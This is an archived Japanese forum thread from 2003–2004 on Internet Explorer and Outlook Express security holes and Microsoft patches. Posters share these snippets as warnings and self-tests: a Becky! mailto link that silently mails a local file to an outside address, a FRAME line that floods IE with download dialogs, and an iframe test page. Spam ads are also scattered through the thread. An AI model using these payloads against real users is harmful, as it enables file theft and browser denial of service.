名無しさん@お腹いっぱい。 :03/04/21 21:28
>>421 俺の場合はIEだけ遅くなった。
パッチID(811493)調べるためにMS03-013のページ開こうとして20分かかった。(通常は10数秒)
その間CPUは100%振り切り(時々CPUステータスのゲットすら出来ない)
コーポレート契約のマカ4.5.1が入ってる。
425 :
名無しさん@お腹いっぱい。 :03/04/23 11:13
>>410 MS03-011関連
Microsoft VMのサポートは2003年末まで,求められるアンインストール機能
相次ぐWindows Updateのトラブル,トラブル情報の周知を
今週のSecurity Check [Windows編] (第93回,2003年4月23日)
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20030422/1/ ・Microsoft VMに「緊急」のセキュリティ・ホール
・Microsoft VMのサポートは2003年末まで
・トラブルが続出するWindows Update
・Windows カーネルにホール,パッチ適用でパフォーマンスの低下も
・ISA Serverにセキュリティ・ホール
・Indexing Server for Windows NT 4.0用パッチが公開
・TechNet Online セキュリティでは“月例”ドキュメント
426 :
名無しさん@お腹いっぱい。 :03/04/24 10:31
427 :
名無しさん@お腹いっぱい。 :03/04/24 10:54
428 :
名無しさん@お腹いっぱい。 :03/04/24 11:45
ちょっと前にMS03-014のパッチに問題があって異常終了するって有ったけど それはもう改善されてんの? もうMS03-014あてても大丈夫?
429 :
名無しさん@お腹いっぱい。 :03/04/24 11:49
430 :
名無しさん@お腹いっぱい。 :03/04/24 11:50
431 :
名無しさん@お腹いっぱい。 :03/04/24 11:54
オペレーターとチャットで相談って使えんの? 今、初めて知ったんだけど。
432 :
名無しさん@お腹いっぱい。 :03/04/24 11:55
>>428 MS03-004だろ。
>>365 改善されてないよ。
MS03-014にMS03-004の不具合の修正がされてればいいのだが、詳細不明。
433 :
名無しさん@お腹いっぱい。 :03/04/24 11:59
ここのところMSはパッチのリリースの速さの方に重点を置いている
ようなので、あわててパッチを当てない方が賢明。
しばらくして不具合報告がないようなら当てる、
自分に必要なパッチかよく検討してみてから当てる(
>>423 )、が吉。
もっとも、全くWindowsUpdateもしないで素のIE5.01とか使ってるのは論外。
435 :
MS03-014,MS03-015 :03/04/24 12:54
436 :
名無しさん@お腹いっぱい。 :03/04/24 17:24
age
437 :
MS03-007 :03/04/24 17:46
441 :
名無しさん@お腹いっぱい。 :03/04/25 10:56
age
Sunの最新JavaランタイムがIEで使えないことが判明したんで SunのをウンインスコしてMS-VMを最新にしたところ セキュ確認済みの未認可AxtiveXが動かない そこでサンドボックス限定で許可したらOK とゆーことは SunのプラグインはOSのセキュ設定レベル見てない サイト鯖自体のセキュ区分で許可の有無はできるが こういうあいまいな部分で素通しなのか ネスケみてえだ
443 :
名無しさん@お腹いっぱい。 :03/05/02 13:39
結局shurikenpro買ったよ
445 :
名無しさん@お腹いっぱい。 :03/05/03 17:39
Becky! なら安心と思ったら大間違い。セキュリティホールが見つかりました。
http://slashdot.jp/security/03/05/02/2151212.shtml?topic=16 65 名前:名無しさん@お腹いっぱい。 投稿日:03/05/03 17:26 ID:nWmKJb8r
おまいら、大変です!!
mailto:
[email protected] ?X-Becky-Attachment=C:/Program%20Files/Katjusha/kakikomi.txt
&X-Becky-Action=send&subject=End_of_the_life&body=moudamepo
こんなリンクが張られたら一巻の終わりじゃないですか?
すぐにかちゅーしゃのインスト先を変えるか、mailto:設定を変えましょう!!
67 名前:65 投稿日:03/05/03 17:29 ID:nWmKJb8r
補足。
>>45 みたいのだと送信前に確認ダイアログが開くけど、
subjectとbodyを付けると確認なしでメールが送られてしまいます。
だから最新パッチあててるOEの方が安全だってば。
447 :
名無しさん@お腹いっぱい。 :03/05/03 17:52
450 :
名無しさん@お腹いっぱい。 :03/05/12 17:06
451 :
動画直リン :03/05/12 17:10
453 :
名無しさん@お腹いっぱい。 :03/05/15 23:43
454 :
名無しさん@お腹いっぱい。 :03/05/16 00:56
>>455 >IEに危険なセキュリティ・ホール,スクリプトを無効にしても攻撃を受ける
これはスゴ過ぎる!
H系DLに紛れ込んで何でもやり放題?
457 :
名無しさん@お腹いっぱい。 :03/05/19 20:51
Hotfix出てないんかい
>>453 >>455 やばいやん、それって。幾らなんでもあまりにも。
最近出た中では、一番嫌っすね。
Redlofみたいなhtmlファイル汚染系ウイルスに組み込ませたら、楽しげですが。
27才人妻です。ダンナがかまってくれないので、いつも一人でオナってます。
でも、けっこうオカズに困るんですよね。そんな時見つけたのがYUIS!!
安いし、安心して買えるしなかなかいいですよ!いつもバイブ物買ってます!
http://www.dvd-yuis.com/
ファイルのダウソ禁止してダウソはツール使うしかなさげだな。
Opera使いの俺はだいじょうび
463 :
cheshire-cat ◆CATBCJABLA :03/05/19 22:41
プロバとどゆ回線契約してるかとか、パソの性能もアリっすかね。 下痢後の酒はちょい体にこたえて。 ちょい吐いてきまする。
>>459 やってみたけど
途中でieがエラー吐いて落ちる。
非力なマシンだと大事にはいたらないのかな?
>>465 (・3・) エェー スラッシュ.に同じような報告あったYO
>>459 のデモ
「現在のセキュリティではDLできません」のダイアログ永遠に開きまくり
IE落としたら「ダウンロードを中止していいですか?」だってw
<FRAME SRC="C:\winnt\****.exe"></FRAME> こんなの並べてるだけでかいな
これマジでやばいよ
Irvineのクリックキャッチを有効にしとくと 1個ずつしかダイアログが出なくなるから大丈夫げ
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―
470 :
(≡゜♀゜≡)) :03/05/22 02:38
472 :
名無しさん@お腹いっぱい。 :03/05/28 12:06
ここのところパフォーマンスダウンの問題で、いまだFIXされない奴 溜まってるのに。。
そろそろ新OS出すために バグをちらほらと小出しにしてる感じだな
476 :
名無しさん@お腹いっぱい。 :03/05/29 00:11
age
477 :
名無しさん@お腹いっぱい。 :03/05/29 10:21
最善の対策:MSOE使うな。 --------------------------終了----------------------------
478 :
名無しさん@お腹いっぱい。 :03/05/29 12:16
>>478 メモ帳以外にあるか?メモ帳以上にいいメーラーがあったら知りたいもんだ。
厨な質問なんですが、ドーナツPしか使ってないんだけどIEのパッチ当ててないと まずいんですか?
>>480 DonutPはIEコンポーネントブラウザです
>>481 まずいってことですね?
イマイチその言葉の意味がよくわからんで、、、
パッチ当てて出直してきます。
483 :
名無しさん@お腹いっぱい。 :03/06/02 21:31
485 :
名無しさん@お腹いっぱい。 :03/06/03 09:28
OEは常にウイルスのターゲットになるからやめとけ
>>478 Edmaxフリー版とか
>>479 どうやってメモ帳をメーラーとして使うんだよ
>>485 「交通事故を起こすので車に乗るのをやめましょう。」って感じの記事だな。
完全にウィルスメールを無くすには以下の仕様のメールソフトになると思う。
・プレーンテキストのみ
・ファイル添付不可
・ハイパーリンク不可
>>485 HTMLメールもウザイが特定のフォントやサイズ以外だと
書式が崩れるメールも止めて欲しい。
>>486 >どうやってメモ帳をメーラーとして使うんだよ
電信8号
EdMAXはメッセージを来たままの状態で保存しないから、糞。
491 :
名無しさん@お腹いっぱい。 :03/06/04 10:19
492 :
名無しさん@お腹いっぱい。 :03/06/04 10:38
先生方よろしくお願いします。 メールソフトは outlook expressを使用していますが 受信メール、送信メールが全て無くなっています。 何日か前にブラクラ踏んでしまい、その後受信メールだけが全て 無くなっており、何日か過ぎました。 そして今日その間に届いていた受信メール+送信メールが無くなって いました。 原因は先日踏んだブラクラなのでしょうか? そしてほっておくとまたこのような事がおきるのでしょうか? 良きアドバイスお願いします。
>>492 諦めて、OEを再インスコすれ
その際にウィルススキャンするのも忘れずに
495 :
名無しさん@お腹いっぱい。 :03/06/04 10:53
496 :
名無しさん@お腹いっぱい。 :03/06/04 11:38
497 :
MS03-020 :03/06/05 09:24
MS03-020: Internet Explorer 用の累積的な修正プログラム (818529)
http://www.microsoft.com/japan/technet/security/bulletin/MS03-020ov.asp ●概要
この修正プログラムは、Internet Explorer に影響を及ぼすセキュリティ上の
問題を排除する累積的な修正プログラムです。
以前に公開された MS03-015 : Internet Explorer 用の累積的な
修正プログラム (813489) で修正された問題に加えて、新たに 2 つの問題を
排除します。
●対象となる製品
・Internet Explorer 6、6 Service Pack 1
・Internet Explorer 5.5 Service Pack 2
・Internet Explorer 5.01 Service Pack 3 for Windows 2000
注意: Internet Explorer 5.01 Service Pack 3 の修正プログラムは、
Windows 2000 環境にのみ適用可能です。
499 :
名無しさん@お腹いっぱい。 :03/06/05 13:16
500 :
名無しさん@お腹いっぱい。 :03/06/05 13:37
501 :
名無しさん@お腹いっぱい。 :03/06/05 15:01
>>498 って
>>455 の
"IEに危険なセキュリティ・ホール,スクリプトを無効にしても攻撃を受ける"
のIEでオーバーフロースタック利用してバックグラウンドでDL実行の
Fixですよね?
>>453 のゾーン無視の方はどうなってるのだろ。。。
502 :
名無しさん@お腹いっぱい。 :03/06/05 15:35
私も便乗でお尋ねしたいのですが、
>>453 の「ゾーン無視」や
>>455 の「スクリプトを無効にしても・・・」って、
「IFRAMEのプログラムとファイルの起動」を全ゾーン
(「マイコンピュータ」を含む)で無効にしててもダメですかね?
>>501 ,
>>501 スタックオーバーフローじゃない。大量にダイアログ開こうとしてリソースが足りなくなって失敗する。
IEはそれを「開く」が選択されたと誤解する。シマンテックの「ゾーン無視」は誤り。
どちらもMS03-020で直る(はず)。
>>502 どんなに制限してもIEオプションでは非表示の
"zone 0"→My computerがあるからダメじゃない?
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
以下各ゾーン見れば解るよ
>>505 ふつー、この板の住人ならセキュリティセッティングに「マイコンピュータ」が出てくる。
あ! マイコンピューターもちゃんと視野に入ってるのね
>>502
>>507 そうでぃ〜す! いずれにしても、レスありがとうございます。
まぁ他人に聞いてばかりいないで自分で試せばいいのか
と思って
>>459 のサンプルページ見に行ったのですが、
もうありませんでした。ざんねん。
>>508 ↓こんな感じでテストすればいい。ダウンロードダイアログが出たら負け。
>>502 の設定じゃ出てくるから負け。
<html>
<body>
<iframe src="file://c|/windows/notepad.exe">
</iframe>
</body>
</html>
>>509 さっそくやってみました。たしかに出ました、ダイアログが!
な〜るほど、こういうことなんですねぇ・・・。
ありがとうございますた。
511 :
名無しさん@お腹いっぱい。 :03/06/05 23:34
512 :
名無しさん@お腹いっぱい。 :03/06/06 10:39
513 :
名無しさん@お腹いっぱい。 :03/06/07 00:27
age
514 :
名無しさん@お腹いっぱい。 :03/06/09 22:49
age
516 :
名無しさん@お腹いっぱい。 :03/06/10 12:42
【川崎憲次郎投手をオールスターに!】
ヤクルト時代は88勝を挙げ'98には最多勝のタイトルを獲得。特に巨人戦には滅法
強く、現役最多の勝利数を誇る。'00年オフにFA権を行使し打倒読売、そして優勝
請負人として満を持して中日入団。
背番号20は元祖燃える男・星野仙一が着けていた番号だった。
しかしここからが苦難の始まりだった。 度重なるケガ。
エースとしての働きを期待されながら2軍で、練習すらできない日々。
2年間一軍で1球も投げていない。
ファンはその巨人キラーの異名と熱い期待をいまだに忘れることができない。
3年契約の3年目、ようやく傷も癒え練習を再開。彼にふさわしい舞台とは?
そう彼に相応しい復活の舞台はオールスターだ!
↓【憲次郎への投票はこちらから】↓
http://allstar.sanyo.co.jp/ 6月10日時点の選手別投票数
http://allstar.sanyo.co.jp/result/detail.html
518 :
名無しさん@お腹いっぱい。 :03/06/15 23:10
>>520 Operaもだめみたい
mozillaは大丈夫
>>520 氏ね厨房
大質量IFRAME
iframe タグが大量にあります。
高い確率で悪意があるものと考えられます。
ヽ(`Д´)ノ ウワァァァァーーーーーーン!!!
>>520 任意のアプリケーションが実行されるセキュリティホールは対策したが
ファイルのダウンロードが表示されてブラクラ状態になるのは放置ですね。
大量のウィンドウ表示を制限する機能をWindowsに付けて欲しいよ。
525 :
名無しさん@お腹いっぱい。 :03/06/17 13:19
ウインドーズ98は、もう更新できないのでしょうか? 更新しようとしても、98についの説明がありません。 それと、インテリマウスがしょっちゅう自動的にクリック するようになってしまうのはブリクラと関係があるのでしょうか? 壊れ始めているよ〜だ! SOS, SOS, , ,
526 :
名無しさん@お腹いっぱい。 :03/06/17 13:29
527 :
名無しさん@お腹いっぱい。 :03/06/17 13:40
おっ、Piggybackで止まった
直リンもやめるべきだろう。
>>520 のメール欄を見る限りは確信犯。
531 :
名無しさん@お腹いっぱい。 :03/06/17 23:34
age
532 :
名無しさん@お腹いっぱい。 :03/06/18 09:59
534 :
名無しさん@お腹いっぱい。 :03/06/19 00:16
あげ
>>533 OSごと落ちる9x系
MS的には「昔そんなのありましたっけ?さっさとXP買ってね」
まあ優先は他の穴だとは思うけどさ
537 :
名無しさん@お腹いっぱい。 :03/06/19 21:34
Win2k/XPなら制限付きユーザーでブラウズすると、 IEが危険とされる理由のひとつである、「勝手にバイナリを ダウンロードして実行したりインストールしたりする機能」が 署名の有無やゾーンにかかわらず完全に無効になるから かなり安全になる。
539 :
名無しさん@お腹いっぱい。 :03/06/20 00:30
age
540 :
名無しさん@お腹いっぱい。 :03/06/22 20:27
あげ
_, ._ ( ゚ Д゚) ( つ O ガシャ と_)_) __ (__()、;.o:。 ゚*・:.。
542 :
名無しさん@お腹いっぱい。 :03/06/25 19:27
age
543 :
名無しさん@お腹いっぱい。 :03/06/26 05:09
IE/OEとは直接関係ないが、
「MS03-021: Windows Media Player の問題により、メディアライブラリがアクセスされる (819639) 」
http://www.microsoft.com/japan/technet/security/bulletin/MS03-021ov.asp ●対象となる製品
・Microsoft Windows Media Player 9 Series
・Microsoft Windows Media Player on Windows Server 2003
●以下の製品はこの問題の影響を受けません。
・Microsoft Windows Media Player 6.4
・Microsoft Windows Media Player 7.1
・Microsoft Windows Media Player for Windows XP
544 :
名無しさん@お腹いっぱい。 :03/06/26 23:24
545 :
IE5.5SP2日本語版 :03/06/27 00:44
>>545 ODNのCD-ROMを店からもらってきた方が後々いいかもしれない
>>545 Meのサポートが終了するまでという名目で復活させたようだが
やはりMicrosoft VMが入ってるからというのが真相だろうな
そういや控訴審はどうなったんだ? 今月あたり判決が出るはずなんだが
>>545 ie5setup.exeはダウソできたものの、Download Siteに接続するとすぐエラーになってしまう。
cab一式はサーバから削除されてしまってるんじゃないか?
>>550 そうか。じゃ、やっぱりODNのCD-ROM貰ってくるしかないか…
553 :
名無しさん@お腹いっぱい。 :03/06/28 19:39
WIN98だが、もうすぐアップデートできなくなるらしい。 DirectX 9.0a ?(DirectX 9.0a には、セキュリティとパフォーマンスを向上するための 更新と、DirectX テクノロジのすべてにわたる新機能が含まれていますという説明の もの)、ダウンロードしておいたほうが良い? ダウンロードしてなにか問題がなかったでしょうか? あったような?
555 :
名無しさん@お腹いっぱい。 :03/06/28 20:00
557 :
名無しさん@お腹いっぱい。 :03/07/02 11:22
OEを糞といってた諸君、一言どうぞ。
559 :
名無しさん@お腹いっぱい。 :03/07/04 06:15
Outlook Express6SP1を使っています。 ツール<オプション<メンテナンス<最適化で以下のメッセージが表示されました。 いままで一度も出たことがありません。 このメッセージについて情報をお持ちの方はいらっしゃいませんでしょうか。 Outlook Expressのフォルダは別ドライブに移動してありますが、 移動後もこれまではうまく動いたと記憶しています。 環境はxpsp1 関係ありそうなアプリはVB2003、ZoneAlarm(フリー版3.7.193)でしょうか。 ちょっと気持ちが悪いので情報提供方よろしくお願いします。 --------------------------- Outlook Express --------------------------- Outlook Express またはほかのアプリケーションがこのフォルダを使用しています。 --------------------------- OK キャンセル ---------------------------
追加です。 アプリとしては上記のほか、 SpywareBlaster(スパイウエアブラスター)でオールチェック Spybot(スパイボット)で免疫化適用 AdAware(アドアウエア)で定期チェック です。 よろしくお願いします。
>>558 HTMLプレビューを許可した状態なら起きるというので、わざと切り替えない限りはOEよりは可能性は低い。
↑ (;´Д`)
563 :
名無しさん@お腹いっぱい。 :03/07/04 22:28
>>559 最適化中に送受信が入るとそのメッセージが出る。
564 :
名無しさん@お腹いっぱい。 :03/07/05 00:11
>>561 OEはだいぶ前に対策済みでプレビュー許可しても発生しませんが、何か?
OEが塞いだ後も指摘されるまで放置してたという事は、OEが塞いだ他の穴も
放置されてる可能性が高いという事ですな。
>>563 やはりそうですか。そんな感じはしていました。
受信は当時1分間隔でチェックに設定していました。
それにしても、受信を完了させた直後でも上記の現象が出ていました。
現在はなぜか治りましたが、未知のスパイかウイルスかその類を
知らずに飼育していたのかもしれないと思って、
気持ち悪くて質問しました。検索はかなりしました。
現象が再発したらまたお尋ねしたく思います。
566 :
名無しさん@お腹いっぱい。 :03/07/05 18:54
>>556 おお、ありがとう。
私は普段はセキュリティ板しか見ていないので、、(反省)。
亀レスになってしまいました(汗)。
567 :
名無しさん@お腹いっぱい。 :03/07/08 00:33
問題点は、OEは対策されるまで公表されない場合が多い。 他のメーラはOEで公表後、後追いでの対策になる。
> OEは対策されるまで公表されない場合が多い。 あたりまえだろ、対策前に公表されたらアタックされるぞ
まぁ、公表されても見ないあほが多いけどな。
571 :
名無しさん@お腹いっぱい。 :03/07/08 11:44
572 :
名無しさん@お腹いっぱい。 :03/07/08 13:47
>>571 Windows ME + IE 6 SP1でも、アドレスバーに c:\aux と入力して
enter すると IE 6 SP1がフリーズした。
573 :
(;´Д`) :03/07/08 14:33
574 :
名無しさん@お腹いっぱい。 :03/07/08 21:49
575 :
名無しさん@お腹いっぱい。 :03/07/10 15:52
578 :
名無しさん@お腹いっぱい。 :03/07/10 23:57
579 :
名無しさん@お腹いっぱい。 :03/07/11 15:12
>>579 関係ないだろ、スレのタイトル読めない?
>580 脳みそがクラックされてるから仕方ない
>>579-581 IE/OEの代替でOpera勧める人がいるから、貼っといても無駄ではないと思う。
>>583 だったらOperaのスレでやってくれ。
ここはIE/OE使う人のためのスレ。
__∧_∧_ |( ^^ )| <寝るぽ(^^) |\⌒⌒⌒\ \ |⌒⌒⌒~| 山崎渉 ~ ̄ ̄ ̄ ̄
保守
588 :
名無しさん@お腹いっぱい。 :03/07/15 17:02
>>585 IE/OE使う人だけのためのスレじゃなくて、
より安全なブラウザ・メーラを建設的に話すスレ
>>1 でもあったんじゃない?
IE/OEの話題がメインだとしても。
↑Unpatched IE security holes
>>588 IEコンポーネントの話ならともかく
Opera自体については完全にスレ違い。
そういったことはOperaのスレッドでどうぞ。
いつのまに"IE/OE使う人のためのスレ"になったんだ…
>>592 Operaの話題はOperaのスレでやれってことでしょ?
それとスレは君の私有物ではないよ
セキュリティパッチ情報集積所でも立てるか
漏れも全部一緒のほうがありがたい
600げっっとーーーーーおぉ!!
∧_∧ ∧_∧ ピュ.ー ( ・3・) ( ^^ ) <これからも僕たちを応援して下さいね(^^)。 =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕 = ◎――――――◎ 山崎渉&ぼるじょあ
hage
>>599 とっくに対策されてるがそこに書かれている対処自体は
実行したほうがいい。
面倒ならWindows Update以外は常に制限ユーザーでIEを使え
604 :
名無しさん@お腹いっぱい。 :03/08/13 14:14
いろいろ読ませてもらったけど、つまるところ OEであれIEコンポーネント使用メーラーであれ、 IEと連携しないように、すべてのメッセージをテキスト形式で受信すれば 何ら問題ないわけですね。
>>604 違う。セキュリティホールを考慮してない。
すべてテキスト形式で受信するなら IEコンポーネントいらないじゃん
607 :
名無しさん@お腹いっぱい。 :03/08/15 20:12
(⌒V⌒) │ ^ ^ │<これからも僕を応援して下さいね(^^)。 ⊂| |つ (_)(_) 山崎パン
(・3・) エェー
613 :
名無しさん@お腹いっぱい。 :03/09/11 10:19
614 :
名無しさん@お腹いっぱい。 :03/09/11 13:34
616 :
名無しさん@お腹いっぱい。 :03/09/20 00:57
617 :
名無しさん@お腹いっぱい。 :03/10/04 19:10
618 :
名無しさん@お腹いっぱい。 :03/10/05 23:26
619 :
名無しさん@お腹いっぱい。 :03/10/06 17:07
620 :
名無しさん@お腹いっぱい。 :03/10/17 09:20
622 :
名無しさん@お腹いっぱい。 :03/11/08 06:27
IEを起動するとthesten.comという外国のアダルトサイトがホームページになっていて、 お気に入りに3つのそのサイトへのリンクが毎回入っています。 履歴やクッキーやゴミ箱の内容など全て消去しても絶対に起動したときに表示されます。 どのたか改善方法を教えてください。
↑ミス Internet Explorer 6 SP1 用の累積的な修正プログラム (KB824145) が出ているので、各自WindowsUpdateされたし。 現時点ではTechNetに情報なし。
626 :
SMTP信号機 :03/11/12 03:06
627 :
名無しさん@お腹いっぱい。 :03/11/12 14:27
MS03-048 - Internet Explorer 用の累積的なセキュリティ更新 (824145)
http://www.microsoft.com/japan/technet/security/bulletin/MS03-048.asp ●影響を受けるソフトウェア
・Microsoft Windows 98 Second Edition
・Microsoft Windows Millennium Edition
・Microsoft Windows NT Workstation 4.0
・Microsoft Windows NT Server 4.0
・Microsoft Windows NT Server 4.0, Terminal Server Edition
・Microsoft Windows 2000
・Microsoft Windows XP
・Microsoft Windows XP 64 bit Edition
・Microsoft Windows XP 64 bit Edition Version 2003
・Microsoft Windows Server 2003
・Microsoft Windows Server 2003 64 bit Edition
●影響
リモートからのコード実行
629 :
名無しさん@お腹いっぱい。 :03/11/12 14:40
>>1 選択肢
(1)Datula、Netscape7.1 Mail、Edmaxなどを使う
630 :
名無しさん@お腹いっぱい。 :03/11/12 14:57
q824145.exe /q:a /r:n これも出来たとはな (´ー`) フッ
誤爆したぜ
633 :
名無しさん@お腹いっぱい。 :03/11/19 19:53
634 :
名無しさん@お腹いっぱい。 :03/11/29 20:24
635 :
名無しさん@お腹いっぱい。 :03/11/30 01:40
最近のウイルス対策製品も IE の御世話になってるもの多い感じだけど どうなの?
> 最近のウイルス対策製品も IE の御世話になってるもの多い感じだけど > どうなの? まぁ、Windows自体に依存してるからね…。 WindowsがIEにも依存してるし。 <= help等
>> 637 そうだねー。でも OS が web browser に依存しているというのは。 完全に逆なんじゃないのかなあ? 少なくともセキュリティー関連のものは独自の仕組で アップデートとか出来た方が安心だと思うのは間違いだろうか。 だからといって完璧ではないだろうけど、若干ましな気がする。
639 :
名無しさん@お腹いっぱい。 :03/12/03 14:31
640 :
名無しさん@お腹いっぱい。 :03/12/11 21:36
>>640 ちなみに、Opera7.23ja(3226)だとセキュリティ警告のダイアローグが出る。
642 :
名無しさん@お腹いっぱい。 :03/12/12 18:06
>>641 Opera6.06でも警告を確認。
これ、ある意味新ウイルスに使われそうなのに、マイクロソフトは危険度低なのね・・・
JokeVirusってどうやって解除するんですか?
645 :
名無しさん@お腹いっぱい。 :03/12/20 03:18
@impoでcss読み込んじゃうなんて何考えてんだろうな
646 :
名無しさん@お腹いっぱい。 :03/12/26 06:41
こんにちは。MLM・NB初心者です。
詳しい方や現在もしくは過去MLM・NBをやられていた方の
ご意見が聞きたくてページ作りました。
よろしくお願いします。
つまらない物ですが、お礼の品も用意しておりますので
ぜひ、どうぞ!
http://gonbea.fc2web.com/
647 :
名無しさん@お腹いっぱい。 :04/01/10 22:26
648 :
名無しさん@お腹いっぱい。 :04/01/14 23:22
649 :
名無しさん@お腹いっぱい。 :04/01/21 18:24
650 :
名無しさん@お腹いっぱい。 :04/01/28 19:48
651 :
名無しさん@お腹いっぱい。 :04/01/28 20:53
652 :
名無しさん@お腹いっぱい。 :04/01/30 18:33
653 :
名無しさん@お腹いっぱい。 :04/02/01 15:55
654 :
名無しさん@お腹いっぱい。 :04/02/02 00:38
IEもうだめぽ
655 :
名無しさん@お腹いっぱい。 :04/02/03 04:14
レベル緊急。 MS04-004 - Internet Explorer 用の累積的なセキュリティ修正プログラム (832894)
656 :
名無しさん@お腹いっぱい。 :04/02/03 10:05
>>656 影響を受けるソフトウェア :
Microsoft Windows NTR Workstation 4.0 Service Pack 6a
Microsoft Windows NT Server 4.0 Service Pack 6a
Microsoft Windows NT Server 4.0 Terminal Server Edition, Service Pack 6
Microsoft Windows 2000 Service Pack 2, Service Pack 3, Service Pack 4
Microsoft Windows XP, Microsoft Windows XP Service Pack 1
Microsoft Windows XP 64-Bit Edition, Microsoft Windows XP 64-Bit Edition Service Pack 1
Microsoft Windows XP 64-Bit Edition Version 2003
Microsoft Windows ServerR 2003
Microsoft Windows Server 2003, 64-Bit Edition
テストした Microsoft Windows および Officeコンポーネント :
Internet Explorer 6 Service Pack 1
Internet Explorer 6 Service Pack 1 (64-Bit Edition)
Internet Explorer 6 Service Pack 1 for Windows Server 2003
Internet Explorer 6 Service Pack 1 for Windows Server 2003 (64-Bit Edition)
Internet Explorer 6
Internet Explorer 5.5 Service Pack 2
Internet Explorer 5.01 Service Pack 4
658 :
名無しさん@お腹いっぱい。 :04/02/03 10:17
659 :
名無しさん@お腹いっぱい。 :04/02/03 11:11
今回のパッチは良く考えてからインスコした方が良さげ スクロールはかちゅにも影響してるので直したいのだがw
661 :
名無しさん@お腹いっぱい。 :04/02/03 23:34
662 :
名無しさん@お腹いっぱい。 :04/02/04 01:59
そもそもブラウザに記録させるようなPASSに、 PASSの意味はあるのかあと小一時間は問い詰めない。
665 :
名無しさん@お腹いっぱい。 :04/02/05 22:40
ofiice ofiice ofiice ofiice ofiice ofiice ofiice ofiice ofiice ofiice ofiice ofiice ofiice ofiice ofiice ofiice ofiice ofiice ofiice ofiice
666 :
名無しさん@お腹いっぱい。 :04/02/09 00:42
↓IEの脆弱の部分 下記のソフトで補うことが出来るんだろうか? このソフト使っている人いたら 教えてね BB de!!スマートブラウジング Ver.1
667 :
名無しさん@お腹いっぱい。 :04/02/11 21:07
668 :
名無しさん@お腹いっぱい。 :04/02/18 11:27
669 :
名無しさん@お腹いっぱい。 :04/02/18 11:34
670 :
名無しさん@お腹いっぱい。 :04/02/18 16:13
671 :
名無しさん@お腹いっぱい。 :04/02/20 20:01
672 :
名無しさん@お腹いっぱい。 :04/03/01 16:45
673 :
名無しさん@お腹いっぱい。 :04/03/04 22:01
>673 >Outlook ExpressはHTMLメールから身を守れる > MicrosoftはOutlook 2003において,HTML形式の電子メール内にある画像 >をブロックし,危険な可能性のある電子メールの添付物(例えば.exeという拡張 >子のファイル)を隔離するという,非常にニーズの高い安全対策を導入した。 >同社はXP SP2でこの機能をOutlook Expressに追加しようとしている。
>>673 >ブラウザのアドオン管理はよくできている
> XP SP2のIEに追加される機能として,「Add-on Management」ツー
>ルがある。これはあなたがプラグインやツールバー,そのほかのご自
>分のシステムにインストールしたIEのアドオンを,リストの形で表示
>させたり,管理したりするのを手助けする。Add-on Managementツー
>ルは,私が知っているところでは,2つの基本機能を備えている。…
>IEの設定はスクリプトによる変更が不可に
> さて,IEに対するセキュリティ面の変更はこれだけに終わらない。
>XP SP2では,IEのウインドウに対してスクリプトによって設定変更を
>加えるのを防げる。
676 :
名無しさん@お腹いっぱい。 :04/03/12 17:10
677 :
名無しさん@お腹いっぱい。 :04/04/03 16:48
678 :
名無しさん@お腹いっぱい。 :04/04/03 19:28
679 :
名無しさん@お腹いっぱい。 :04/04/03 21:43
いちいち右クリしなきゃならんのか…
680 :
名無しさん@お腹いっぱい。 :04/04/04 13:16
HTMLメールをテキストで表示するようにしてれば大丈夫なのではないかと…
681 :
名無しさん@お腹いっぱい。 :04/04/06 18:18
682 :
名無しさん@お腹いっぱい。 :04/04/06 19:24
>>680 それはマンドクセ・・
でも、そうしないとヤバい?
Outlook 2003はOEとちがってプレビューしても安全でしょうか?
686 :
名無しさん@お腹いっぱい。 :04/04/07 14:13
>>682 ノートンは"MHTMLRedir.Exploit"として検出するようだ。
>>682 それexploit公開されてる?
XPSP2だと発動しないのか再現に失敗してるだけなのか
確かめたいんだが
689 :
名無しさん@お腹いっぱい。 :04/04/08 11:25
690 :
名無しさん@お腹いっぱい。 :04/04/09 23:01
691 :
名無しさん@お腹いっぱい。 :04/04/09 23:07
692 :
名無しさん@お腹いっぱい。 :04/04/10 20:29
これはヤバいかも・・・
694 :
名無しさん@お腹いっぱい。 :04/04/14 11:06
695 :
名無しさん@お腹いっぱい。 :04/04/14 11:11
>>7 HTMLの表示 > テキストに変換して表示
696 :
名無しさん@お腹いっぱい。 :04/04/14 11:19
>>197 セキュリティーをするのに 無料と思ってる前提が糞でつ
697 :
名無しさん@お腹いっぱい。 :04/04/14 11:46
2年前の投稿にレスつけられてもな・・・
>>688 問題あった
そこに書かれてるのはMS03-032とMS04-013を組み合わせた
攻撃が存在するということだけで、MS03-032を利用しない
攻撃も可能
699 :
名無しさん@お腹いっぱい。 :04/04/14 12:14
パッチをあてる と アップグレードは意味ちがうのですか?
厳密にはな、まあ前後の文意から読め つーか何の話だ
>>699 パッチをあてるは文字通りその穴に対する「つぎあて」。グレードはあがらないのが普通。
702 :
名無しさん@お腹いっぱい。 :04/04/14 14:02
703 :
名無しさん@お腹いっぱい。 :04/04/20 14:05
705 :
名無しさん@お腹いっぱい。 :04/04/21 10:50
706 :
名無しさん@お腹いっぱい。 :04/04/21 22:49
セキュリティ・ホールを突くフィッシングが出現,キー・ロガーを仕掛ける
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040421/143365/ >今回のフィッシングが突くセキュリティ・ホールは,マイクロソフト
>が4月14日に公開したセキュリティ・ホールの一つ「MS04-013」であ
>る(関連記事)。このセキュリティ・ホールは「Outlook Expressに
>関するセキュリティ・ホール」とされているものの,正確には
>Outlook Expressに実装されている「MHTMLプロトコル・ハンドラ」の
>セキュリティ・ホールである。このため,Outlook Expressに限らず,
>Internet Explorer(IE)などで「mhtml」を含むURLにアクセスする
>場合には,このセキュリティ・ホールの影響を受ける。同社のセキュ
>リティ情報で「Outlook Expressを使っていなくても,Outlook Express
>がインストールされている環境ではパッチを適用する必要がある」と
>しているのはこのためである。つまり,「MS04-013」のパッチを適用
>していない環境において,偽のメール(フィッシング・メール)に記
>載されたリンクにIEでアクセスすると,キー・ロガーを勝手にインス
>トールされることになる。
708 :
名無しさん@お腹いっぱい。 :04/05/08 22:22
709 :
名無しさん@お腹いっぱい。 :04/05/11 14:10
711 :
名無しさん@お腹いっぱい。 :04/05/12 22:31
712 :
名無しさん@お腹いっぱい。 :04/05/13 15:56
714 :
名無しさん@お腹いっぱい。 :04/05/20 12:57
715 :
